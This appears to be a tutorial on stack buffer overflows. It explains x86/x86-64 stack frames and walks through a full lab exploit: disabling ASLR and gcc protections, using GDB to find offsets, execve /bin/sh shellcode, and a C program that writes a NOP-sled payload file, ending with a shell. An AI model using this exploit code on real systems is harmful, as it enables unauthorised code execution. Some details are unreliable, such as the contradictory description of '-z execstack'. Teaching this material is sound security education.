# Buffer Overflow Attack

## Table of Contents
1. [Introduction](#Introduction)
    1. [Where the top of the Stack is on X86](#Where-the-top-of-the-Stack-is-on-X86)
    1. [Stack Frame Layout on X86-64](#Stack-Frame-Layout-on-X86-64)
        1. [Argument Passing and Stack Frame Layout on X86-64](#Argument-Passing-and-Stack-Frame-Layout-on-X86-64)
        1. [The Red Zone](#The-Red-Zone)
1. [Buffer Overflow](#Buffer-Overflow)
1. [Countermeasures Overview](#Countermeasures-Overview)

## List of Figure
1. [Program Memory Layout](#Figure-Program-Memory-Layout)
1. [Layout for a functions stack frame on X86](#Figure-Layout-for-a-functions-stack-frame-on-X86)
1. [Layout for a stack frame on X86](#Figure-Layout-for-a-stack-frame-on-X86)
1. [Argument Passing and Stack Frame Layout on X86-64](#Figure-Argument-Passing-and-Stack-Frame-Layout-on-X86-64)
1. [Leaf Function and Stack Frame Layout on X86-64](#Figure-Leaf-Function-and-Stack-Frame-Layout-on-X86-64)
1. [Using NOP to improve the Success rate](#Figure-Using-NOP-to-improve-the-Success-rate)
1. [The Structure of badfile](#Figure-The-Structure-of-badfile)

## List of Code
1. [Push and pop statement](#Code-Push-and-pop-statement)
1. [Argument Passing and Stack Frame Layout on X86-64](#Code-Argument-Passing-and-Stack-Frame-Layout-on-X86-64)
1. [Leaf Function and Stack Frame Layout on X86-64](#Code-Leaf-Function-and-Stack-Frame-Layout-on-X86-64)
1. [Simple Stack Buffer Overflow](#Code-Simple-Stack-Buffer-Overflow)
1. [The Vulnerable Program](#Code-The-Vulnerable-Program)
1. [Finding the Address Using GDB](#Finding-the-Address-Using-GDB)
1. [Assembly Program Executing Bash in Minimal Size](#Code-Assembly-Program-Executing-Bash-in-Minimal-Size)
1. [Get Shellcode From Assembly](#Code-Get-Shellcode-From-Assembly)
1. [Make Badfile for using in Stack program](#Code-Make-Badfile-for-using-in-Stack-program)
1. [Result of Executing Stack Program](#Code-Result-of-Executing-Stack-Program)

## Introduction
Buffer overflow can happen on both stack and heap. The ways to exploit them are
quite different.

When a function is called, a block of memory space will be allocated on the top
of the stack, and it is called **Stack Frame**.

A stack frame has four important regions:
* **Arguments**
  
  It should be noted that the arguments are pushed in the reverse order.
  On x86 these arguments are pushed on the stack.

* **Return Address**
  
  Before jumping to the entrance of the function, the computer pushes the
  address of the next instruction - the instruction placed right after the
  function invocation instruction - into the top of the stack.

* **Previous Frame Pointer**
  
* **Local Variables**

Inside a function, we need to access the arguments and local variables. The
only way to do that is to know their memory addresses. Unfortunately, the
addresses cannot be determined during the compilation time, because compilers
cannot predict the run-time status of the stack, and will not be able to know
where the stack frame will be. To solve this problem, a special register is
introduced in the CPU. It is called **Frame pointer**. This register points to
a fixed location in the stack frame, so the address of each argument and local
variable on the stack frame can be calculated using this register and an
offset. The offset can be decided during the compilation time, while the value
of the frame pointer can change during the runtim, depending on where a stack
frame is allocated on the stack.

Briefly **Stack pointer** point to the top of the stack. while **Frame
pointer** point to the current active frame. There is only one frame pointer
register, and it always points to the stack frame of the current function.
Before entring the callee function, the caller's frame pointer value is stored
in the **previous frame pointer** field on the stack. When the callee returns,
the value in this field will be used to set the frame pointer register, making
it point to the caller's stack frame again.

```ASCII
                                      
               |                   |
               |                   |  
               |                   |  
(High address) |-------------------|  
               |       Stack       |  
               |-------------------|  
               |         |         |  
               |         |         |  
               |         v         |  
               |                   |  
               |         ^         |  
               |         |         |  
               |         |         |  
               |-------------------|  
               |       Heap        |  
               |-------------------|  
               |    BSS Segment    |  
               |-------------------|  
               |   Data Segment    |  
               |-------------------|  
               |   Text Segment    |  
(Low address)  |-------------------|  
               |                   |  
               |                   |  
               |                   |  
```
###### Figure-Program Memory Layout

```ASCII
                                                               
                (High address)                                 
                   |                   |                       
                   |                   |                       
                   +-------------------+ --                    
                   |    Value of b     |   |                   
Stack Grows        |-------------------|   |-> Arguments       
    |              |    Value of a     |   |                   
    |              |-------------------| --                    
    |              |   Return Address  |                       
    |              |-------------------|                       
    |              |   Previous Frame  |                       
    |              |       Pointer     |                       
    |  Current --> |-------------------| --                    
    |  Frame       |    Value of x     |   |                   
    |  Pointer     |-------------------|   |-> Local variables 
    |              |    Value of Y     |   |                   
    v              +-------------------+ --                    
                   |                   |                       
                   |                   |                       
                (Low address)                                  
```
###### Figure-Layout for a functions stack frame on X86

### Where the top of the Stack is on X86
When we say **top of the stack** we actually mean the **lowest address** in the
memory area.

**ESP** Register point to the top of the stack. To push the new data on the
stack we use the push. What push does it first decrement esp by 4 and then
stroe its operand in the location esp point to.

```ASCII
                (High address)                         (High address)           
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   +-------------------+                  +-------------------+ 
  0x9080ABCC ----> |        Foo        | 0x9080ABCC ----> |        Foo        | 
                   |-------------------|                  |-------------------| 
  0x9080ABC8 ----> |                   | 0x9080ABC8 ----> |     0xDEADBEEF    | 
                   |                   |                  |-------------------| 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                   +-------------------+                  +-------------------+ 
                   |                   |                  |                   | 
                   |                   |                  |                   | 
                (Low address)                          (Low address)            
```
###### Figure-Layout for a stack frame on X86

```asm
push eax

; Previous push statement is actually equivalent to the following statement.
; Suppose eax held 0xDEADBEEF value as showed in previous figure.

sub esp, 4
mov [esp], eax

pop eax

; Similarly, the pop instructure equivalent to the following statement.
; So 0xDEADBEEF is written into eax.

mov eax, [esp]
add esp, 4
```
###### Code-Push and pop statement

### Stack Frame Layout on X86-64
As far as we know 64-bits system has 16 General-Purpose register

```asm
RAX, RBX, RCX, RDX, RBP, RSP, RSI, RDI, R8, R9, R10, R11, R12, R13, R14, R15
```

Some of them has special implicit meaning. The relatively large amount of
available influenced some important design decisions for the ABI, such as
passing many arguments in registers, theres rendering the stack less useful
than before.

#### Argument Passing and Stack Frame Layout on X86-64
According to the ABI, the first 6 integer on pointer arguments to a function
are passed in registers. The first is placed in RDI, The second in RSI, The
third in RDX, and then RCX, R8 and R9. Only the 7th argument and onwards are
passed on the stack.

```C
/*
 * myfunc is non-leaf function & prevent the compiler
 * from applying the red zone optimization.
 * In this function the 6 first argument are passed via register and
 * other passed on the stack.
 */
long myfunc (long a, long b, long c, long d, long e, long f, long g, long h)
{
        long xx = a * b * c * d * e * f * g * h;
        long yy = a + b + c + d + e + f + g + h;
        long zz = utilfunc (xx, yy, xx % yy);
        return zz + 20;
}
```
###### Code-Argument Passing and Stack Frame Layout on X86-64

```ASCII
                                                                                   
              |                        |                                           
              |                        |                                           
              |------------------------|               |------------------------|  
    RBP + 24  |            h           |           RDI |           a            |  
              |------------------------|               |------------------------|  
    RBP + 16  |            g           |           RSI |           b            |  
              |------------------------|               |------------------------|  
    RBP + 8   |      Return address    |           RDX |           c            |  
              |------------------------|               |------------------------|  
    RBP       |        Saved RBP       | <-- RBP   RCS |           d            |  
              |------------------------|               |------------------------|  
    RBP - 8   |           xx           |           R8  |           e            |  
              |------------------------|               |------------------------|  
    RBP - 16  |           yy           |           R9  |           f            |  
              |------------------------|               |------------------------|  
    RBP - 24  |           zz           | <-- RSP                                       
              |------------------------|                                           
              |                        |                                           
              |                        |                                           
              |                        |                                           
              |                        |                                           
              |                        |                                           
              |                        |                                           
Lower Address |                        | <--- Red Zone                             
              |                        |      128 bytes                            
              |                        |                                           
              |                        |                                           
              |                        |                                           
              |                        |                                           
              |------------------------|                                           
              |                        |                                           
              |                        |                                           
```
###### Figure-Argument Passing and Stack Frame Layout on X86-64

#### The Red Zone
The 128 byte are beyond the location pointed to by RSP is considered to be
reserved and shall not be modified by signal on interrupt handlers. Therefor,
functions may use this area for temporary data that is not needed across
function calls, in particular, leaf functions may use this area for their
entire stack frame, rather than adjusting the stack pointer in the prologue and
epilogue. This area known as red zone. function that call no other function is
called leaf function.

The red zone is an optimization. Code can assume that the 128 bytes below RSP
will not be asynchronously clobbered by signals or interrupt handlers, and thus
can use it for scratch data, without explicitly moving the stack pointer.

The last sentence is where the optimization lays - decrementing RSP and
restoring it are two instructions that can be saved when using the red zone for
data.

Keep in mind that the red zone will be clobbered by function calls, so it's
usually most useful in leaf function.

```C
long utilfunc (long a, long b, long c)
{
        long xx = a + 2;
        long yy = b + 3;
        long zz = c + 4;
        long sum = xx + yy + zz;
        return xx + yy + zz + sum;
}
```
###### Code-Leaf Function and Stack Frame Layout on X86-64

```ASCII                                                                  
                                           |------------------------|  
                                       RDI |           a            |  
  |                        |               |------------------------|  
  |                        |           RSI |           b            |  
  |------------------------|               |------------------------|  
  |      Return address    |           RDX |           c            |  
  |------------------------|    - RBP      |------------------------|  
  |        Saved RBP       | <-|       RCS |           d            |  
  |------------------------| -  - RSP      |------------------------|  
  |           xx           |  |        R8  |           e            |  
  |------------------------|  |            |------------------------|  
  |           yy           |  |        R9  |           f            |  
  |------------------------|  |            |------------------------|  
  |           zz           |  |                                        
  |------------------------|  |                                        
  |                        |  |                                        
  |                        |  |                                        
  |                        |  |-> Red Zone                             
  |                        |  |   128 byte                             
  |                        |  |                                        
  |                        |  |                                        
  |                        |  |                                        
  |                        |  |                                        
  |                        |  |                                        
  |                        |  |                                        
  |                        |  |                                        
  |                        |  |                                        
  |------------------------| -                                         
  |                        |                                           
  |                        |                                           
```
###### Figure-Leaf Function and Stack Frame Layout on X86-64

## Buffer Overflow
Let us see the following example.

```C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void foo(char *str)
{
        char buffer[12];

        strcpy(buffer, str);
}

int main(int argc, char *argv[])
{
        foo(argv[1]);

        exit(EXIT_SUCCESS);
}
```
###### Code-Simple Stack Buffer Overflow

Since the source string is longer than 12 bytes, ```strcpy()```, will overwrite
some portion of the stack above the buffer. This is called **buffer overflow**.

It should be noted that stacks grow from high address to low address, but
buffers still grow in the normal direction (i.e., from low to high). Therefore,
when we copy data to ```buffer[]```, we start from ```buffer[0]```, and
eventually to ```buffer[11]```. If there are still more data to be copied,
```strcpy()``` will continue copying the data to the region above the buffer,
treating the memory beyond the buffer as ```buffer[12]```, ```buffer[13]```,
and so on.

**Note**: In the program does not take any input from outside, even if there is
a buffer overflow problem, attackers cannot take advantage of it.

```C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int foo(char *str)
{
        char buffer[100];

        strcpy(buffer, str);

        return 1;
}

int main(int argc, char *argv[])
{
        char str[400];
        FILE *badfile;

        memset(str, 0, 400);
        badfile = fopen("badfile", "r");
        fread(str, sizeof(char), 300, badfile);
        foo(str);

        printf("Returned Properly\n");
        return 0;
}
```
###### Code-The Vulnerable Program

One of the countermeasures against buffer overflow attacks is the 
**Address Space Layout Randomization** (**ASL**). It randomizes the memory
space of the key data areas in a process, including the base of the executable
and the positions of the stack, heap and libraries, making it difficult for
attackers to guess the address of the injected malicious code.

```bash
$ sudo sysctl -w kernel.randomize_va_space=0
$ sysctl -a --pattern "randomize"
```

**GCC** options to turn off two countermeasures that have already been built
into the ```gcc``` compiler.

* **-z execstack**
  
  The option makes the stack non-executable, which prevents the injected
  malicious code from getting executed. A program, through a special marking in
  the binary, can tell the operating system whether its stack should be set to
  executable or not. The marking in the binary is typically done by the
  compiler. The ```gcc``` compiler marks stack as non-executable by default,
  and the "**-z execstack**" option reverses that, making stack executable. It
  should be noted that this countermeasure can be defeated using the
  **return-to-libc** atack.

* **-fno-stack-protector**
  
  This option turns off another countermeasure called **Stack-Guard**, which
  can defeat the stack-based buffer overflow attack. Its main idea is to add
  some special data and checking mechanisms to the code so when a buffer
  overflow occurs, it will be detected. This countermeasure has been built into
  the gcc compiler not to use the **StackGuard** countermeasure.

  To be able to jump to our malicious code, we need to know the memory address
  of the malicious code. Unfortunately, we do not know where exactly our
  malicious code is. We only know that our code is copied into the target
  buffer on the stack. buffer's memory address, exact location depends on the
  program's stack usage.

  We need to know the address of the function foo's stack frame to calculate
  exactly where our code will be stored.

  In theory, the entire search space for a random guess s 2^32 address (for 32
  bit machine), but in practice the space is much smaller.

Two facts make the search space small:
1. Before countermeasures are introduced, most OS place the stack at a fixed
   starting address. It should be noted that the address is a virtual
   address, which is mapped to a different physical memory address for
   different processes. therefore, there is no conflict for different
   processes to use the same virtual address for its stack.
1. Most programs do not have a deep stack. We know the function stack can grow
   deep if the function call chain is long, but this usually happens in
   recursive function calls. Typically, call chains are not very long, so in
   most programs, stacks are quite shallow.

Combining the first and second facts, we can tell that the search space is much
smaller than 2^32.

For our guess to be successful, we need to guess the exact entry point of our
injected code. If we miss by one byte, we fail. This can be improved if we can
create many entry points for our injected code. The idea is to add many No-Op
(NOP) instructions before the actual entry point of our code. The NOP
instruction advances the program counter to the next location, so as long as we
hit any of the NOP instructions, eventually, we will get to the actual starting
point of our code. This will increase our success rate very significantly.


```ASCII
   |                   |                    |                   |
   |                   |                    |                   |
   |                   |                    |                   |
   +-------------------+                    +-------------------+
   |   Malicious Code  |               |--->|   Malicious Code  |
   +-------------------+               |    +-------------------+
   |                   |               |-|->|        NOP        |
   |    (Overwrite)    |<-|              |  |-------------------|
   |                   |  | Inaccurate   |--|        NOP        |<-|
   +-------------------+  | Guess -         +-------------------+  |
   |New Return Address |--| Failed Attack   |New Return Address |--|
   +-------------------+                    +-------------------+
   |    (Overwrite)    |                    |    (Overwrite)    |
   +-------------------+<-- ebp             +-------------------+<-- ebp
   |                   |                    |                   |
   |    (Overwrite)    |                    |    (Overwrite)    |
   |                   |                    |                   |
   +-------------------+                    +-------------------+
   |                   |                    |                   |
   |                   |                    |                   |
   |                   |                    |                   |
   |                   |                    |                   |
   |                   |                    |                   |
   |                   |                    |                   |
   |                   |                    |                   |
   |                   |                    |                   |

       (Without NOP)                              (With NOP)
```

###### Figure-Using NOP to improve the Success rate

We will use a debugging method to find out where the stack frame resides on the
stack, and use that to derive where our code is. We can directly debug the
program and print out the value of the frame pointer when the function foo is
invoked. It shoud be noted that when a privileged **Set-UID** program is
debugged by a normal user, the program will not run with the privilege, so
directly changing the behavior of the program inside the debugger will not
allow us to gain any privilege.

```Bash
$ gdb -q stack
Reading symbols from stack...done.
(gdb) set disassembly-flavor intel
(gdb) b foo
Breakpoint 1 at 0x1185: file stack.c, line 9.
(gdb) run
Starting program: /home/arash/Laboratory/Software-Security-Laboratory/Vulnerable Buffer Overflow/stack
Breakpoint 1, foo (str=0x7fffffffe510 '\220' <repeats 120 times>, "p\345\377\377\377\177") at stack.c:9
9               strcpy(buffer, str);
(gdb) p $rbp
$1 = (void *) 0x7fffffffe4f0
(gdb) p &buffer
$2 = (char (*)[100]) 0x7fffffffe480
(gdb) p 0x7fffffffe4f0 - 0x7fffffffe480
$5 = 112
(gdb)
```
###### Code-Finding the Address Using GDB

From the above execution results, we can see that the value of the frame
pointer is ```0x7fffffffe4f0```. Therefore, we can tell that the return address
is stored in ```0x7fffffffe4f0 + 8```, And the first address that we can jump
to ```0x7fffffffe4f0 + 16```(The memory regions starting from this address is
filled with NOPs). Therefore, we can put ```0x7fffffffe4f0 + 16``` inside the
return address field.

```ASCII
                         Once the input is copied into buffer,              
                         the address of this position will be               
        Distance = 112   0x7fffffffe4f0 + 16                                                 
     ___________|__________       |                                         
    |                      |      v                                         
    +-----+-----+----------+------+-----+----------+-----+----------------+ 
    | NOP | NOP |    ...   |  RT  | NOP |    ...   | NOP | Malicious Code | 
    +-----+-----+----------+------+-----+----------+-----+----------------+ 
    ^                         ^      <----------                            
    |                         |                 \----------                 
Start of Buffer:          The value placed                |                 
Once the input is         here will overwrite           The first possible  
Copied into buffer,       the Return Address field      entry point for the 
The memory address                                      malicious code      
will be 0x7fffffffe480
```
###### Figure-The Structure of badfile

```ASM
global _start                                                                   
section .text                                                                   
_start:                                                                         
        ;Push /bin//sh with NULL terminated to stack                            
        ;and set address of stack to rdi for first argument of execve           
        xor rax, rax                                                            
        push rax                        ;Push Null                              
        mov rbx, 0x68732f2f6e69622f     ;Set /bin//sh                           
        push rbx                        ;Push /bin//sh                          
        mov rdi, rsp                                                            
                                                                                
        ;Making third argument of execve                                        
        push rax                        ;push Null                              
        mov rdx, rsp                                                            
                                                                                
        ;As far as RDI now pointing to address of /bin//sh with Null terminated 
        ;we can use it as 2D array for second argument of execve                
        push rdi                                                                
        mov rsi, rsp                                                            
                                                                                
        mov al, 59                     ;Set execve system call                  
        syscall
```
###### Code-Assembly Program Executing Bash in Minimal Size

```Bash
 objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
```
###### Code-Get Shellcode From Assembly

```C
#include <stdio.h>                                                              
#include <stdlib.h>                                                             
#include <string.h>                                                             
                                                                                
char shellcode[]= "\x55\x48\x89\xe5\x48\x83\xec\x10\xeb\x1a\x5f\x48\x89\x7d\xf0\x4d\x31\xdb\x4c\x89\x5d\xf8\x48\x8d\x4d\xf0\x48\x89\xce\x48\x31\xd2\xb0\x3b\x0f\x05\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
                                                                                
void main(int argc, char*argv[])                                                
{                                                                               
        char buffer[200];                                                       
        FILE *badfile;                                                          
                                                                                
        memset(&buffer, 0x90, 200);                                             
                                                                                
        *((long *) (buffer + 120)) = 0x7fffffffe4f0 + 0xc0;                     
                                                                                
        memcpy(buffer + sizeof(buffer) - sizeof(shellcode),                     
                        shellcode, sizeof(shellcode));                          
                                                                                
        badfile = fopen("badfile", "w");                                        
        fwrite(buffer, 200, 1, badfile);                                        
        fclose(badfile);                                                        
}
```
###### Code-Make Badfile for using in Stack program

```Bash
$ ./stack
sh-5.0$ 
```
###### Code-Result of Executing Stack Program

It should be noted in [Code](#Code-Make-Badfile-for-using-in-Stack-program) we
do not use ```0x7fffffffe4f0 + 16```, as we have calculated before; instead, we
use a larger value. There is a reason for this: the address was identified
using the debugging method, and the stack frame of the *foo* function may be
different when the program runs inside **gdb** as opposed to running directly,
because gdb may push some additional data onto the stack at the beginning,
causing the stack frame to be allocated deeper than it would be when the
program runs directly. Therefore, the first address that we can jump to may be
higher than ```0x7fffffffe4f0 + 16```. If their attacks fail we can try
different offsets.

Another important thing to remember is that the result of ```0x7fffffffe4f0 + nnn```
should not contain a zero in any of its byte, so for this reason we try to
optimize our Shellcode writed in Assembly language and omit the zeros. And
ofcourse if badfile has a zero in the middle, causing the ```strcpy()```
function to end the copying earlier, without copying anything after the zero.

## Countermeasures Overview
The buffer overflow problem has quite a long history, and many countermeasures
have been proposed. These countermeasures can be deployed in various places,
from hardware architecture, OS, compiler, library, to the application itself.

* **Safer Functions**:
  
  Like strncpy, snprintf, strncat, fgets, ...

* **Safer Dynamic Link Library**:
  
  The *Safer Functions* requires changes to be made to the program. If we only
  have the binary, it will be difficult to change the program. We can use the
  dynamic linking to achieve the similar goal. Many programs use dynamic link
  libraries, i.e., the library function code is not included in a program's
  binary, instead, it is dynamically linked to the program. If we can build a
  safer library and get a program to dynamically link to the functions in this
  library, we can make the program safer against buffer overflow attacks.

  An example of such a library is ```libsafe``` developed by Bell Labs. It
  provides a safer version for the standard unsafe functions, which does
  boundary checking based on ```%ebp``` and does not allow copy beyond the
  frame pointer. Another example is the C++ string module ```libmib```.

* **Program Static Analyzer**:
  
  Instead of eliminating buffer overflow, this type of solution warns
  developers of the patterns in code that may potentially lead to buffer
  overflow vulnerabilities. The solution is often implemented as a command-line
  tool or in the editor.

* **Programming Language**:
  
  Languages, such as *Java* and *Python*, which provide automatic boundary
  checking.
  
* **Compiler**:
  
  Compilers control the layout of stack. Compilers also insert instructions
  into the binary that that can verify the integrity of a stack, as well as
  eliminating the coditions that are necessary for buffer overflow attacks.
  
  Two well-known compiler-based countermeasures are:
  * **Stackshield**
  * **StackGuard**

  These countermeasures check whether the return address has been modified or
  not before a function returns.

* **Operating System**:
  
  Before a program is executed, it needs to be loaded into the system, and the
  running environment needs to be set up. This is the job of the loader program
  in most operating systems. The setup stage provides an opportunity to counter
  the buffer overflow problem because it can dictate how the memory of a
  program is laid out. A common countermeasure implemented at the OS loader
  program is referred to as Address Space Layout Randomization or **ASLR**.

* **Hardware Architecture**:
  
  Modern CPUs support a feature called **NX bit**. The NX bit, standing for
  No-eXecute, is a technology used in CPUs to separate code from data. Operating
  systems can marks certain areas of memory as non-executable, and the
  processor will refuse to execute any code residing in these areas of memory.
  Using this CPU feature, the attack described earlier in this document will not
  work anymore, if the stack is marked as non-executable. However, this
  countermeasure can be defeated using a different technique called
  **return-to-libc** attack.
